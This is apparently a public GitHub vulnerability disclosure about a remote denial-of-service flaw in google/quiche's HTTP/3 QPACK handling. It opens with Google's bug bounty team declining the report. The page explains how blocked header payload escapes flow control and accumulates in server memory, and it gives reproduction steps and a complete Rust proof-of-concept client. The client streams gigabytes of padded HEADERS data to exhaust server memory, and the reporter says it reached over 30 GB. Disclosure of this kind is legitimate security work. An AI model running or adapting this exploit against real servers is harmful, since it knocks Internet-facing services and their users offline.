-
Notifications
You must be signed in to change notification settings - Fork 168
Denial-of-Service Attack Against the HTTP/3 Stack via QPACK Blocked Decoding #105
Description
Hi! We've decided that the issue you reported is not severe enough for us to track it as a security bug. When we file a security vulnerability to product teams, we impose monitoring and escalation processes for teams to follow, and the security risk described in this report does not meet the threshold that we require for this type of escalation on behalf of the security team.
Please feel free to publicly disclose this issue on GitHub as a public issue.
Thanks again for your report and time,
The Google Bug Hunter Team
Vulnerability type: Denial of Service (DoS)
Details
Vulnerability Description
The issue is not a simple QPACK decoding failure. The root cause is that, when a QPACK header block becomes blocked waiting for dynamic table updates, the corresponding HTTP/3 HEADERS payload bytes are accounted for as consumed by the QUIC receive-flow-control path, while the same bytes are still retained in an internal heap buffer inside the QPACK decoder.
In the affected design, HEADERS frame payload is delivered progressively to the HTTP/3/QPACK layer rather than being fully buffered and bounded before processing. If the header block prefix declares a Required Insert Count that depends on dynamic table entries not yet received on the QPACK encoder stream, the decoder enters a blocked state. Once blocked, subsequent header block bytes are appended to an internal decoder buffer and are not semantically decoded until the required dynamic table insertions arrive.
However, on the request stream path, the implementation still marks the received payload as consumed after each decode call. As a result, stream-level and connection-level flow-control windows are returned to the peer even though the payload bytes are still resident in heap memory. This creates a discrepancy between protocol-level accounting and actual memory retention.
Because HTTP/3 HEADERS frames are processed in a streaming manner and are not subject to the buffered-frame payload cap used for certain other HTTP/3 frame types, and because the blocked-stream limit only constrains the number of concurrently blocked header blocks rather than the retained size of each blocked block, an attacker can keep feeding additional HEADERS payload bytes into the hidden decoder-side heap buffer. In practice, this can lead to unbounded memory growth and denial of service of the HTTP/3 stack.
In one sentence, the vulnerability can be summarized as follows:
During blocked QPACK decoding, HEADERS payload is released from QUIC receive-flow-control accounting before it becomes safely releasable in memory, causing the payload to accumulate in an internal heap buffer that is no longer effectively bounded by QUIC flow control.
Attack Preconditions
- The target uses IETF QUIC with HTTP/3 enabled.
- The server supports the QPACK dynamic table.
- The server permits blocked QPACK streams (commonly with QPACK_BLOCKED_STREAMS = 100 by default, or another non-zero value).
- The attacker can establish at least one normal HTTP/3 connection to the target service.
- The attacker can send a syntactically valid HEADERS frame whose QPACK header block prefix declares dependence on a dynamic table entry that has not yet arrived.
In deployments using google/quiche as the HTTP/3 server core, these conditions are met by default. Therefore, no additional privileges, authentication, or special access are required beyond the ability to interact with the service as a normal remote HTTP/3 client.
Reproduction Steps / POC
Target / Product Information
- Target class: HTTP/3 servers or applications built on the affected HTTP/3/QPACK stack behavior.
- Relevant components involved in the issue include:
- quiche/quic/core/qpack/qpack_progressive_decoder.cc
- quiche/quic/core/http/quic_spdy_stream.cc
- quiche/quic/core/qpack/qpack_decoded_headers_accumulator.cc The tested server we used is bazel-bin/quiche/quic_server, built from the google/quiche codebase and started with its default parameters exposing HTTP/3 service.
Under this deployment model, the attack preconditions described above are satisfied by default. Therefore, no special privileges, authentication, or non-standard access are required beyond the ability to interact with the server as a normal remote HTTP/3 client.
Minimal Reproduction Conditions
- Only one QUIC connection is required for a minimal reproduction.
- Multiple request streams on the same connection can be used to amplify the effect.
Reproduction Procedure
- Establish a normal HTTP/3 connection and complete the QUIC handshake.
- On the client control stream, send a valid SETTINGS frame so that the HTTP/3 session is fully initialized.
- Open a request bidirectional stream.
- Send a HEADERS frame on that request stream.
- Construct the QPACK header block prefix so that it declares a dependency on a dynamic table entry that has not yet been inserted. A minimal blocked prefix may resemble 020080, which expresses a non-zero Required Insert Count and causes the decoder to wait for a missing dynamic table entry.
- Continue transmitting additional fragments belonging to the same HEADERS frame payload on the request stream.
- Do not send the corresponding QPACK encoder stream insertions required to satisfy the declared dependency.
- Continue feeding more HEADERS payload bytes on the same blocked request stream, or repeat the same pattern across multiple request streams on the same connection.
Expected Result / Reproduction Output
- The server does not necessarily terminate the connection immediately.
- The affected request stream remains stalled in a QPACK-blocked state while waiting for encoder stream updates.
- Additional HEADERS payload bytes continue to accumulate in the decoder’s internal heap buffer.
- At the same time, the implementation may already mark those bytes as consumed from the QUIC stream/sequencer perspective and return flow-control credit to the peer.
- The peer can therefore continue sending more data within the same connection, even though memory usage on the server continues to grow.
- At the application level, the observable symptom is typically that the request remains pending indefinitely while server memory usage increases abnormally, eventually leading to service degradation or denial of service.
Proof-of-Concept Implementation
- A proof-of-concept client was implemented using the cloudflare/quiche library to trigger the issue.
- Build Instructions
- Place poc.rs in the following directory within the cloudflare/quiche repository: quiche/h3i/src/bin/
- From the repository root, build the PoC binary with: cargo build -p h3i --bin poc
- Usage
- Run the PoC as follows: target/debug/poc [host(server_name):port]
The PoC establishes a normal HTTP/3 connection and sends a crafted HEADERS sequence designed to place QPACK decoding into a blocked state while continuing to deliver additional HEADERS payload bytes without satisfying the required dynamic table dependency.
- Run the PoC as follows: target/debug/poc [host(server_name):port]
Using the PoC program described above, I reproduced the issue and documented the result in poc.png. In my testing, a single malicious HTTP/3 connection was sufficient to cause the server to retain more than 30 GB of memory, confirming that the issue is practically exploitable as a severe remote DoS.
Attack scenario
The vulnerability is remotely exploitable by any user who can access the target’s HTTP/3 service. When google/quiche is used as the server-side HTTP/3 implementation, the vulnerable conditions are satisfied under normal operation. An attacker does not need authentication, elevated privileges, or multiple connections. A single malicious client connection is sufficient to keep the server in a state where HEADERS payload is continuously retained in heap memory without an effective upper bound. As a result, one attacker can progressively consume all available server memory and trigger a denial of service. In other words, any Internet-facing service built on google/quiche and permitting HTTP/3 traffic is exposed to practical remote DoS risk.
POC
use std::env;
use std::path::Path;
use std::time::Duration;
use clap::App;
use clap::Arg;
use h3i::actions::h3::Action;
use h3i::actions::h3::WaitType;
use h3i::client::sync_client;
use h3i::config::Config;
use h3i::HTTP3_CONTROL_STREAM_TYPE_ID;
use h3i::QPACK_DECODER_STREAM_TYPE_ID;
use h3i::QPACK_ENCODER_STREAM_TYPE_ID;
use quiche::h3::frame::Frame;
use quiche::h3::Header;
use quiche::h3::NameValue;
const CONTROL_STREAM_ID: u64 = 2;
const QPACK_ENCODER_STREAM_ID: u64 = 6;
const QPACK_DECODER_STREAM_ID: u64 = 10;
const SSLKEYLOGFILE_PATH: &str = "/media/john/Data/key.log";
fn main() -> Result<(), String> {
let mut log_builder = env_logger::builder();
if env::var_os("RUST_LOG").is_none() {
log_builder.filter_level(log::LevelFilter::Info);
}
log_builder.format_timestamp_nanos().init();
prepare_sslkeylogfile()?;
let options = parse_options()?;
let config = build_client_config(&options)?;
let actions = build_actions(&options);
let summary = sync_client::connect(config, actions, None)
.map_err(|e| format!("connection failed: {e:?}"))?;
println!(
"{}",
serde_json::to_string_pretty(&summary)
.map_err(|e| format!("failed to serialize summary: {e}"))?
);
Ok(())
}
fn prepare_sslkeylogfile() -> Result<(), String> {
let path = Path::new(SSLKEYLOGFILE_PATH);
if let Some(parent) = path.parent() {
std::fs::create_dir_all(parent).map_err(|e| {
format!(
"failed to create SSLKEYLOGFILE directory {}: {e}",
parent.display()
)
})?;
}
env::set_var("SSLKEYLOGFILE", path);
log::info!("writing TLS key log to {}", path.display());
Ok(())
}
struct Options {
host_port: String,
connect_to: Option<String>,
server_name: Option<String>,
omit_sni: bool,
verify_peer: bool,
idle_timeout_ms: u64,
payload_len: usize,
chunk_size: usize,
chunk_wait_ms: u64,
stream_wait_ms: u64,
initial_wait_ms: u64,
final_wait_ms: u64,
request_count: usize,
}
fn parse_options() -> Result<Options, String> {
let matches = App::new("qpack-blocked-decode-amplified")
.about("Send blocked QPACK HEADERS frames over multiple request streams")
.arg(
Arg::with_name("host:port")
.help("Hostname and port of the HTTP/3 server")
.required(true)
.index(1),
)
.arg(
Arg::with_name("connect-to")
.long("connect-to")
.help(
"Set a specific IP address to connect to, rather than \
use DNS resolution",
)
.takes_value(true),
)
.arg(
Arg::with_name("server-name")
.long("server-name")
.help("Override the TLS SNI server name")
.takes_value(true),
)
.arg(
Arg::with_name("omit-sni")
.long("omit-sni")
.help("Omit the SNI from the TLS handshake")
.takes_value(false),
)
.arg(
Arg::with_name("no-verify")
.long("no-verify")
.help("Don't verify server certificate")
.takes_value(false),
)
.arg(
Arg::with_name("idle-timeout")
.long("idle-timeout")
.help("The QUIC idle timeout value in milliseconds")
.default_value("25000")
.takes_value(true),
)
.arg(
Arg::with_name("payload-len")
.long("payload-len")
.help("Raw QPACK payload length per request stream in bytes")
.default_value("8388608000")
.takes_value(true),
)
.arg(
Arg::with_name("chunk-size")
.long("chunk-size")
.help("Bytes sent per StreamBytes action")
.default_value("4096")
.takes_value(true),
)
.arg(
Arg::with_name("chunk-wait-ms")
.long("chunk-wait-ms")
.help("Delay between chunks on the same request stream")
.default_value("2")
.takes_value(true),
)
.arg(
Arg::with_name("stream-wait-ms")
.long("stream-wait-ms")
.help("Delay between request streams")
.default_value("5")
.takes_value(true),
)
.arg(
Arg::with_name("initial-wait-ms")
.long("initial-wait-ms")
.help("Delay after sending SETTINGS")
.default_value("10")
.takes_value(true),
)
.arg(
Arg::with_name("final-wait-ms")
.long("final-wait-ms")
.help("Delay after the last request chunk before close")
.default_value("400")
.takes_value(true),
)
.arg(
Arg::with_name("request-count")
.long("request-count")
.help("Number of client-initiated bidirectional request streams")
.default_value("4")
.takes_value(true),
)
.get_matches();
let chunk_size = parse_value::<usize>(&matches, "chunk-size")?;
let request_count = parse_value::<usize>(&matches, "request-count")?;
if chunk_size == 0 {
return Err("chunk-size must be greater than 0".to_string());
}
if request_count == 0 {
return Err("request-count must be greater than 0".to_string());
}
Ok(Options {
host_port: matches.value_of("host:port").unwrap().to_string(),
connect_to: matches.value_of("connect-to").map(ToString::to_string),
server_name: matches.value_of("server-name").map(ToString::to_string),
omit_sni: matches.is_present("omit-sni"),
verify_peer: !matches.is_present("no-verify"),
idle_timeout_ms: parse_value(&matches, "idle-timeout")?,
payload_len: parse_value(&matches, "payload-len")?,
chunk_size,
chunk_wait_ms: parse_value(&matches, "chunk-wait-ms")?,
stream_wait_ms: parse_value(&matches, "stream-wait-ms")?,
initial_wait_ms: parse_value(&matches, "initial-wait-ms")?,
final_wait_ms: parse_value(&matches, "final-wait-ms")?,
request_count,
})
}
fn parse_value<T>(matches: &clap::ArgMatches, name: &str) -> Result<T, String>
where
T: std::str::FromStr,
T::Err: std::fmt::Display,
{
matches
.value_of(name)
.unwrap()
.parse()
.map_err(|e| format!("{name} parse error: {e}"))
}
fn build_client_config(options: &Options) -> Result<Config, String> {
let mut config = Config::new()
.with_host_port(options.host_port.clone())
.with_idle_timeout(options.idle_timeout_ms)
.verify_peer(options.verify_peer);
if options.omit_sni {
config = config.omit_sni();
}
if let Some(connect_to) = &options.connect_to {
config = config.with_connect_to(connect_to.clone());
}
if let Some(server_name) = &options.server_name {
config = config.with_server_name(server_name.clone());
}
config
.build()
.map_err(|e| format!("invalid configuration: {e}"))
}
fn build_actions(options: &Options) -> Vec<Action> {
let request_streams = request_stream_ids(options.request_count);
let qpack_payload = blocked_qpack_payload_with_padding(options.payload_len);
let mut actions = Vec::new();
actions.push(Action::OpenUniStream {
stream_id: CONTROL_STREAM_ID,
fin_stream: false,
stream_type: HTTP3_CONTROL_STREAM_TYPE_ID,
});
actions.push(Action::SendFrame {
stream_id: CONTROL_STREAM_ID,
fin_stream: false,
frame: Frame::Settings {
max_field_section_size: None,
qpack_max_table_capacity: None,
qpack_blocked_streams: Some(request_streams.len() as u64 + 2),
connect_protocol_enabled: None,
h3_datagram: None,
grease: None,
additional_settings: None,
raw: None,
},
});
actions.push(Action::OpenUniStream {
stream_id: QPACK_ENCODER_STREAM_ID,
fin_stream: false,
stream_type: QPACK_ENCODER_STREAM_TYPE_ID,
});
actions.push(Action::OpenUniStream {
stream_id: QPACK_DECODER_STREAM_ID,
fin_stream: false,
stream_type: QPACK_DECODER_STREAM_TYPE_ID,
});
actions.push(Action::FlushPackets);
if options.initial_wait_ms > 0 {
actions.push(wait_action(options.initial_wait_ms));
}
for (index, stream_id) in request_streams.iter().enumerate() {
append_raw_headers_stream_script(
&mut actions,
*stream_id,
&qpack_payload,
options.chunk_size,
options.chunk_wait_ms,
);
if options.stream_wait_ms > 0 && index + 1 != request_streams.len() {
actions.push(wait_action(options.stream_wait_ms));
}
}
if options.final_wait_ms > 0 {
actions.push(wait_action(options.final_wait_ms));
}
// actions.push(Action::ConnectionClose {
// error: quiche::ConnectionError {
// is_app: true,
// error_code: quiche::h3::WireErrorCode::NoError as u64,
// reason: vec![],
// },
// });
actions
}
fn request_stream_ids(request_count: usize) -> Vec<u64> {
(0..request_count).map(|index| index as u64 * 4).collect()
}
fn wait_action(ms: u64) -> Action {
Action::Wait {
wait_type: WaitType::WaitDuration(Duration::from_millis(ms)),
}
}
fn encode_varint(value: u64) -> Vec<u8> {
match value {
0..=63 => vec![value as u8],
64..=16_383 => ((value as u16) | 0x4000).to_be_bytes().to_vec(),
16_384..=1_073_741_823 => {
((value as u32) | 0x8000_0000).to_be_bytes().to_vec()
},
_ => (value | 0xc000_0000_0000_0000).to_be_bytes().to_vec(),
}
}
fn raw_headers_frame_bytes(payload: &[u8]) -> Vec<u8> {
let mut frame = encode_varint(0x1);
frame.extend(encode_varint(payload.len() as u64));
frame.extend_from_slice(payload);
frame
}
fn append_raw_headers_stream_script(
actions: &mut Vec<Action>, stream_id: u64, qpack_payload: &[u8],
chunk_size: usize, inter_chunk_wait_ms: u64,
) {
let frame_bytes = raw_headers_frame_bytes(qpack_payload);
for (index, chunk) in frame_bytes.chunks(chunk_size).enumerate() {
actions.push(Action::StreamBytes {
stream_id,
fin_stream: false,
bytes: chunk.to_vec(),
});
actions.push(Action::FlushPackets);
if inter_chunk_wait_ms > 0
&& index + 1 != frame_bytes.len().div_ceil(chunk_size)
{
actions.push(wait_action(inter_chunk_wait_ms));
}
}
}
fn blocked_qpack_payload_with_padding(total_len: usize) -> Vec<u8> {
let mut payload = blocked_qpack_payload();
if total_len > payload.len() {
payload.resize(total_len, b'A');
}
payload
}
fn blocked_qpack_payload() -> Vec<u8> {
let padding_headers = vec![
Header::new(b"x-pad-a", b"aaaaaaaaaaaaaaaa"),
Header::new(b"x-pad-b", b"bbbbbbbbbbbbbbbb"),
];
let mut tail = encode_header_block(&padding_headers).unwrap_or_default();
tail = tail.get(2..).unwrap_or_default().to_vec();
let mut payload = vec![0x02, 0x00, 0x80];
payload.extend(tail);
payload
}
fn encode_header_block(
headers: &[quiche::h3::Header],
) -> std::result::Result<Vec<u8>, String> {
let mut encoder = quiche::h3::qpack::Encoder::new();
let headers_len = headers
.iter()
.fold(0, |acc, h| acc + h.value().len() + h.name().len() + 32);
let mut header_block = vec![0; headers_len];
let len = encoder
.encode(headers, &mut header_block)
.map_err(|_| "Internal Error".to_string())?;
header_block.truncate(len);
Ok(header_block)
}